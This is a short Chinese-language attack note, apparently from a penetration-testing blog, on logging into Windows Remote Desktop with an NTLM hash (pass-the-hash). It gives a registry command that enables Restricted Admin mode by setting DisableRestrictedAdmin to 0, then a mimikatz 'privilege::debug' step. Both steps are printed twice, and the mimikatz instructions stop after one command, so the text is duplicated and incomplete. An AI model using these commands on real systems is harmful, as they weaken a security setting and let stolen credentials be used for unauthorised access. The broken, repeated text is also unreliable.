hash登陆RDP远程桌面
第一步:开启Restricted Admin mode
1 | REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f |
第二步:利用mimikatz使用NTLM凭证登录RDP
1 | privilege::debug |
第一步:开启Restricted Admin mode
1 | REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f |
第二步:利用mimikatz使用NTLM凭证登录RDP
1 | privilege::debug |